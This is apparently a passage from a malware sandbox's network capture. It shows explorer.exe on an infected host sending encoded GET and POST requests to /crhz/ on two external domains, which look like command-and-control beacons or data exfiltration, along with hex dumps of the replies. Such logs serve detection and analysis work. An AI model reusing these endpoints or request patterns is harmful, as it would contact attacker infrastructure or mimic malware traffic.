Jan 25, 2023 13:22:32.908483028 CET	196	IN	Data Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
Jan 25, 2023 13:22:32.908507109 CET	198	IN	Data Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35 Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
Jan 25, 2023 13:22:32.908524990 CET	198	IN	Data Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20 Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49713	184.94.215.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:35.326555014 CET	199	OUT	GET /crhz/?Mkn=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo2QZ2CGF/wkiG+Fw==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.teammart.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:22:35.598840952 CET	200	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 12:22:35 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
Jan 25, 2023 13:22:35.598901033 CET	201	IN	Data Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
Jan 25, 2023 13:22:35.598949909 CET	203	IN	Data Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
Jan 25, 2023 13:22:35.599000931 CET	204	IN	Data Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
Jan 25, 2023 13:22:35.599042892 CET	204	IN	Data Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49714	103.221.223.104	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:41.044262886 CET	206	OUT	POST /crhz/ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.suachuadienlanh247.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.suachuadienlanh247.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 48 41 4b 35 73 76 63 4b 48 45 61 6e 47 71 45 39 71 49 43 6a 78 6b 72 46 52 67 2d 45 69 65 57 6b 61 6f 50 4a 54 6a 77 75 34 55 62 44 63 4b 5f 64 33 78 71 56 5f 53 39 6e 46 71 69 4a 35 67 76 32 45 41 38 44 78 55 36 5a 69 33 53 42 42 75 69 70 33 53 61 59 46 35 73 6d 68 6e 56 46 33 32 6a 77 73 41 57 4b 58 4d 44 32 4b 57 45 4b 64 61 59 58 5f 6f 37 6d 53 34 2d 4a 6a 74 34 6a 72 5a 55 55 57 61 57 66 2d 67 47 6f 68 28 70 77 67 6e 7a 34 4e 6d 4b 43 57 49 54 58 4a 6e 6c 6a 78 35 39 31 4e 30 74 71 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=PAqkdS49ivc9LHAK5svcKHEanGqE9qICjxkrFRg-EieWkaoPJTjwu4UbDcK_d3xqV_S9nFqiJ5gv2EA8DxU6Zi3SBBuip3SaYF5smhnVF32jwsAWKXMD2KWEKdaYX_o7mS4-Jjt4jrZUUWaWf-gGoh(pwgnz4NmKCWITXJnljx591N0tqQ).
Jan 25, 2023 13:22:41.409465075 CET	207	IN	HTTP/1.1 404 Not Found expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/" content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked date: Wed, 25 Jan 2023 12:22:41 GMT server: LiteSpeed connection: close Data Raw: 31 36 38 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5c 4b b3 db c6 72 5e 5b bf 62 44 d5 3d 87 90 01 1c 00 7c 93 a2 9c 6b c9 aa b8 62 5f bb 2c 79 91 b2 54 aa 21 30 24 61 81 00 02 80 e7 61 fa ac b3 c8 2a 95 3f 70 93 5b d9 25 55 a9 54 56 f6 22 0b a7 f2 3f f4 4f d2 3d 83 17 f1 20 40 52 ba b9 7a 1c 12 33 3d 5f f7 f4 f4 74 f7 0c 66 ce 93 87 cf bf 79 f6 ea 6f bf fd 82 ac a3 8d f3 f4 c1 13 fc 20 0e 75 57 f3 ce b5 dd c1 02 46 ad a7 0f 3e 79 b2 61 11 25 e6 9a 06 21 8b e6 9d ef 5f bd 50 c6 1d 72 95 d6 b8 74 c3 b0 09 bb f1 bd 20 ea 10 d3 73 23 e6 02 e5 8d 6d 45 eb b9 c5 ae 6d 93 29 fc 41 26 b6 6b 47 36 75 94 d0 a4 0e 9b eb 1c 27 07 73 19 78 0b 2f 0a 2f 53 90 cb 0d bd 55 ec 0d 5d 31 c5 0f 18 32 99 3a 34 58 b1 4b de 30 b2 23 87 3d fd 9b f5 6f ff e5 ae 48 f4 db bf 6d 48 b4 7e ff cb bf de 91 28 80 7e 10 f7 b7 3f de 91 8b 47 63 43 d7 67 e4 55 b0 e5 44 ff b2 21 e1 fb 5f ff 1d 7b c4 3f 16 ef 7f f9 93 47 ac ff fd 8f f7 bf fe 33 12 ac ed f7 bf fc 77 04 c5 bf fe 03 f9 9f 7f b4 df ff fa f7 2e 89 80 32 7d 70 7e fb a3 bb 26 46 7f f4 e4 4a f0 7f f0 c4 b1 dd 77 24 60 ce fc d2 72 43 14 74 c9 22 73 7d 49 d6 f0 6d 7e 79 75 15 6e a9 b9 de 52 cb 66 2e 28 78 0d 6d 55 d3 db 88 3e a4 6d 3b d4 89 58 e0 d2 88 75 48 74 e7 83 4e a9 ef 3b b6 49 23 db 73 af 82 30 fc f4 76 e3 40 15 f2 9c 77 9e ff f6 9f 5c 5a d1 75 db fd 08 fd 23 17 01 fd bb ad 37 eb 88 7e 74 d6 51 e4 87 d3 ba de 5c 2d 19 b3 ae 3a e7 f7 c9 87 21 fc 93 4b 40 fa 7f b2 ff ff 7b 05 ff 37 60 88 61 be 7b a1 19 d8 7e f4 f4 c1 8d ed 5a de 8d fa f6 c6 67 1b ef 47 fb 25 8b 60 20 56 21 99 93 5d 67 41 43 f6 7d e0 74 a6 31 83 d7 57 af af 42 f5 46 f5 82 d5 eb 2b 6e d0 e1 6b 00 0f d8 eb 2b de f8 f5 95 de 57 35 55 7b 7d 35 32 6e 47 c6 eb ab 8e dc 61 b7 11 b4 57 7d 77 05 0f e1 f5 ea 34 3c 68 c8 d1 e0 f3 0b 01 08 df f0 d9 db 06 26 eb 4c 77 1d 98 6c 30 22 bc 59 8c 2f e0 2b 35 f2 fa ea c6 57 6c d7 74 b6 16 b2 fc 31 e4 05 bc b1 02 43 ce a0 df ea c6 76 d5 1f c3 cf ae 59 30 1f aa ba aa 77 ee ef 67 0f ae 1e 3f 24 af d6 76 48 96 b6 c3 08 7c d2 6d e4 29 2b e6 b2 00 98 5b e4 f1 d5 83 87 cb ad 6b a2 69 74 99 4c e5 48 da 5d d3 80 b8 72 20 7b b2 3d a7 aa 19 30 a0 fc c2 61 38 22 dd 8e 49 dd 6b 1a 76 24 d9 9f db ea 8a 45 cf d0 67 dc 46 17 17 f9 a7 6e c7 b0 3a d2 2c 01 26 21 40 c7 c0 74 fe 32 0a 60 c0 d4 65 e0 6d 9e 81 7f 7b e6 59 4c 66 f3 ae af 9a d0 8f e0 3b 66 46 5d 4d d6 64 5b 15 de cb 56 d7 cc 5e ad 23 e0 a8 42 27 9c 57 88 4f 55 34 e9 bb 2e 98 60 28 33 09 c8 35 09 28 23 ef 39 8d e8 f7 df 7d d5 95 a4 59 c0 a2 6d e0 92 d3 71 a3 18 97 cd e7 f3 3d ec fb b4 63 66 97 89 6e 45 65 4d 09 83 05 35 44 6a 18 98 73 d0 80 6a 81 8f 0a e6 91 2a 66 25 6a ea ea 47 0a ea 14 94 32 45 15 c6 ed c3 cf ef 5e d1 d5 1f c0 3f 77 3b 18 13 3a d2 0f da 1b 94 8e b9 d6 b3 b5 ed 58 dd 08 e4 f0 Data Ascii: 168a\Kr^[bD=\|kb_,yT!0$aa?p[%UTV"?O= @Rz3=_tfyo uWF>ya%!_Prt s#mEm)A&kG6u'sx//SU]12:4XK0#=oHmH~(~?GcCgUD!_{?G3w.2}p~&FJw$`rCt"s}Im~yunRf.(xmU>m;XuHtN;I#s0v@w\Zu#7~tQ\-:!K@{7`a{~ZgG%` V!]gAC}t1WBF+nk+W5U{}52nGaW}w4<h&Lwl0"Y/+5Wlt1CvY0wg?$vH\|m)+[kitLH]r {=0a8"Ikv$EgFn:,&!@t2`em{YLf;fF]Md[V^#B'WOU4.`(35(#9}Ymq=cfnEeM5Djsjf%jG2E^?w;:X
Jan 25, 2023 13:22:41.409533024 CET	208	IN	Data Raw: 82 ae 37 ff 7d 10 d0 bb 6e 67 e9 50 b4 30 61 51 12 70 0b b7 3e 06 87 70 be 63 60 14 77 d0 27 77 35 7d a8 c9 d9 d3 17 b7 26 f3 a3 17 d0 10 ca ef e5 60 ae cd 82 27 9e ea 30 77 15 ad 67 c1 a7 9f 4a 19 ca 0f de 0f c1 9b 37 f3 cc 58 a4 9d bd ec fa 17 Data Ascii: 7}ngP0aQp>pc`w'w5}&`'0wgJ7XC]\|v;ePHoIBi<haM#y8zylhy2TWK=d0`86g]<_-]\Zz=tc?F/szUGg8H@Sf\
Jan 25, 2023 13:22:41.409584045 CET	210	IN	Data Raw: 60 c6 66 71 94 0b b5 6f df 8a e9 ba 13 fa 51 50 b7 a0 3f 94 71 76 03 b3 4a 59 40 1a ff 2e d1 41 5d 6b 2e a9 0d b1 74 97 1f 06 ad 96 9e 84 d7 ab 1d 84 00 b1 85 0d 3a 41 76 f8 1c b7 14 05 b8 f1 30 35 b7 41 00 5e e5 19 f6 7b 56 c8 70 b9 be 60 9e 46 Data Ascii: `fqoQP?qvJY@.A]k.t:Av05A^{Vp`F^:.Nuc[idXpm7-5H9[.~p=Rqvu3gqK\gao)dm]$SXHV&5"4^?R>h[%OTKc
Jan 25, 2023 13:22:41.409634113 CET	211	IN	Data Raw: 53 65 20 1e 33 4b 5f 9a 87 b0 f3 d4 22 37 3e 44 2d 52 65 20 9d 2c 06 3a ab e9 23 9e 73 6b 18 3d 8c 7e 01 0d a3 06 bb f1 03 b0 f0 00 cd 65 f2 fc c5 0b a3 86 2a 7d a5 07 74 bd fe e0 59 1d 5a 84 bb 6f 82 ec c5 10 ff 16 c8 d2 dc b0 b4 e6 48 97 21 49 Data Ascii: Se 3K_"7>D-Re ,:#sk=~e}tYZoH!IkDXP#0`Q,X@aWd/R-dVPXKka-5rhfvR10@ejkqQ6>?51/.qm7'OMMs A>
Jan 25, 2023 13:22:41.409688950 CET	212	IN	Data Raw: e6 46 23 b8 78 bb b8 67 f6 95 f0 46 d6 b9 3c 83 fa 91 dc 7b 7f 5a b2 fd fc 7d 99 f2 2c c8 d7 36 8c c8 c7 51 51 15 8f 0f af a9 2a 2e 1f 5d 61 7b 5e 3e 55 9e 94 7b 16 01 a8 e8 ce a5 5d f6 a2 a7 1c 8d aa d2 43 69 f6 b1 87 1d 73 cc 56 62 a5 c9 a8 54 Data Ascii: F#xgF<{Z},6QQ.]a{^>U{]CisVbT3jj5MvZ-lAU!y_E)]p^[Ir%AzXX/CXN#\|.r=HH$Yw{wVqq/8%k>+[
Jan 25, 2023 13:22:41.409739017 CET	213	IN	Data Raw: 34 35 63 0d 0a ec 5d 4b 4f db 40 10 be f7 57 ac 7c 01 24 62 af 5f b1 5d 12 da 52 5a 84 54 a4 2a 6d e9 b1 72 12 bb 18 39 71 64 1b 4c 0f fd ef 9d d9 5d 1b 3b 4f 27 84 24 6a c2 01 f2 da d9 99 d9 6f c6 63 b2 3b 5f e9 60 3e 92 78 e4 db 1b 45 4b f6 c5 Data Ascii: 45c]KO@W\|$b_]RZT*mr9qdL];O'$joc;_`>xEKd5lqVfv,9+u6cIo;y]t!z^=/gI{6q!SA%>LwP)=\|ACjtx# 9\|_;:!#M\r.ciaKL3x
Jan 25, 2023 13:22:41.410799980 CET	214	IN	Data Raw: 36 64 66 0d 0a dd 5d 3b 6f dc 46 10 ae ef 7e c5 84 2e 4e 46 4c 9e 78 77 92 25 e8 51 44 31 12 03 36 60 c0 ea 05 ea 48 e9 18 f3 c8 33 1f 91 e5 c0 55 8a 14 69 92 32 55 5e 45 aa 00 01 d2 f9 8a 14 36 f2 3f ee 9f e4 9b d9 e5 9b d2 e9 8c 34 49 21 91 5c Data Ascii: 6df];oF~.NFLxw%QD16`H3Ui2U^E6?4I!\ggfggxRZLI#qBXz^ly+zQrE\|[eNHVLFSD1EK"4Y;-PLY^z@qgZ9%Mgr8_5"?V`
Jan 25, 2023 13:22:41.410887957 CET	215	IN	Data Raw: 8b 4c e4 6a 77 3e 37 55 7e c5 c9 55 a8 ab 22 94 9a 11 dc a0 be 11 ee 68 5e 6b 09 64 f5 1e e1 9a 0c 1b 95 a9 f9 5e 77 ba 58 b9 c3 a9 bb 73 d4 5a aa 45 c7 79 b1 6a 52 d5 aa 95 24 7b c5 76 64 56 3c bd bb b6 b7 45 17 59 28 31 ce d6 7d 91 22 6c 03 b1 Data Ascii: Ljw>7U~U"h^kd^wXsZEyjR${vdV<EY(1}"l@2y\}2(&9xT5?51W~J9T4uDm;\r>jh^a93Lg8X)7]^A]`16?xalS~V3z\> nhN
Jan 25, 2023 13:22:41.410923958 CET	215	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49715	103.221.223.104	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:43.874982119 CET	221	OUT	POST /crhz/ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.suachuadienlanh247.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.suachuadienlanh247.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 6d 77 4b 28 4c 54 63 44 48 45 56 73 6d 71 45 6d 36 49 65 6a 78 67 72 46 51 6b 75 45 77 79 57 6a 4a 51 50 49 78 4c 77 69 59 55 62 57 4d 4b 37 51 58 78 38 56 5f 76 47 6e 45 61 59 4a 36 4d 76 33 57 34 38 45 52 55 37 56 69 33 54 45 42 75 6c 30 6e 53 61 59 46 38 44 6d 69 7e 69 46 33 75 6a 77 5a 55 57 4b 52 67 41 33 61 57 42 49 64 61 59 58 5f 73 6f 6d 53 34 41 4a 67 64 6f 6a 71 6c 55 47 31 53 57 64 72 4d 46 68 52 7e 41 34 41 6d 63 31 73 50 56 47 57 68 69 5a 4a 44 33 6f 32 77 57 78 74 38 6b 28 38 54 67 51 49 75 38 69 79 42 6a 50 6d 75 71 50 44 71 33 4a 4f 68 39 79 70 33 35 41 4d 77 7a 7a 46 37 45 28 4c 64 36 35 71 61 4c 6a 47 72 7a 67 55 4b 69 62 47 62 45 28 4b 42 76 38 42 65 56 51 55 39 36 7a 79 6c 34 71 45 4e 6d 70 33 34 6c 77 49 64 49 7e 63 57 74 64 38 39 4f 79 55 33 5a 6a 41 69 69 36 39 72 72 6a 31 71 75 34 41 56 4e 30 42 79 62 57 47 76 41 53 41 41 39 6e 74 42 61 70 30 4d 58 38 53 62 6c 38 52 73 6b 5a 76 57 46 6a 4c 59 79 45 59 6e 4c 6f 64 4b 38 6a 54 37 73 4f 5a 77 32 75 47 75 30 56 68 67 54 7a 6b 39 76 59 63 4b 50 33 4a 78 50 54 55 42 57 28 73 46 31 38 76 51 64 7e 65 4a 70 31 4c 43 57 4f 71 4a 4d 37 56 43 63 58 65 58 69 78 55 34 47 57 55 56 71 45 47 30 55 43 73 5a 46 4b 74 54 74 77 6c 78 44 65 31 33 30 78 68 28 73 72 79 77 4c 78 42 30 69 62 66 69 72 6b 5f 65 49 66 4c 4a 73 37 43 30 4a 56 68 39 72 7e 5a 76 74 63 37 37 4c 32 30 6a 33 65 71 6b 70 41 30 37 64 44 54 46 69 55 4a 54 50 61 33 31 43 32 6a 31 69 53 4d 6a 4c 44 63 30 59 73 33 45 75 28 38 52 43 77 6f 75 43 6a 48 41 71 31 62 56 54 49 7a 4c 4b 69 31 72 65 48 4c 30 7a 38 4a 55 70 66 42 76 6b 52 6b 33 4d 6c 6b 65 37 79 64 35 44 4a 39 4f 67 6b 67 67 32 41 4b 42 4a 28 6b 4b 73 32 53 56 4d 41 39 46 33 37 43 4c 47 59 67 41 61 32 66 61 30 63 55 42 75 28 5f 50 32 36 55 7e 51 28 2d 72 55 71 34 6d 4f 36 57 74 71 30 77 6e 42 30 64 7a 4e 46 68 6c 6e 34 7a 54 61 7a 69 48 37 4e 4e 79 77 63 59 58 46 35 6f 52 36 73 6f 4e 53 62 73 79 4e 31 6e 36 4e 76 66 75 45 43 4c 73 54 7a 31 75 64 47 72 58 41 59 4a 30 34 63 4b 36 61 4d 54 4b 36 30 38 42 6c 35 4d 48 68 57 32 6a 36 4b 70 41 7a 4b 37 78 66 51 52 57 4e 64 2d 6a 74 43 51 31 47 4e 6a 54 76 49 6e 4c 76 62 52 6e 55 30 68 35 4b 64 7a 4f 43 56 42 4d 52 57 72 64 33 6c 52 35 62 46 7a 68 52 42 49 50 4a 52 6e 76 31 41 62 62 66 72 6e 50 30 4e 6d 6e 67 75 67 63 4b 38 51 52 71 50 48 76 74 6f 71 6b 77 44 32 41 63 74 49 6e 77 4c 56 34 33 51 78 32 52 70 4d 36 36 38 78 39 41 37 4f 46 72 62 77 33 5a 72 7a 74 37 5a 52 44 4a 4b 79 6b 73 54 4e 53 6a 72 47 6d 7a 33 73 68 4d 65 77 48 56 7a 4e 4c 63 65 2d 4b 62 61 5f 77 53 77 71 70 43 61 68 46 4f 72 54 59 47 37 58 48 36 34 30 6f 2d 72 6c 5a 65 64 57 37 68 72 61 32 6e 6c 4d 49 38 38 31 61 5a 45 38 28 54 43 48 6d 57 75 61 38 55 6c 6c 51 62 6b 34 6f 43 77 4d 71 54 7a 6a 6b 34 65 4e 74 37 73 71 7e 72 4c 76 6a 4a 50 52 55 6e 48 48 67 46 5a 7a 33 34 6b 33 6b 6b 7a 2d 65 76 31 63 67 38 35 51 72 79 55 33 6f 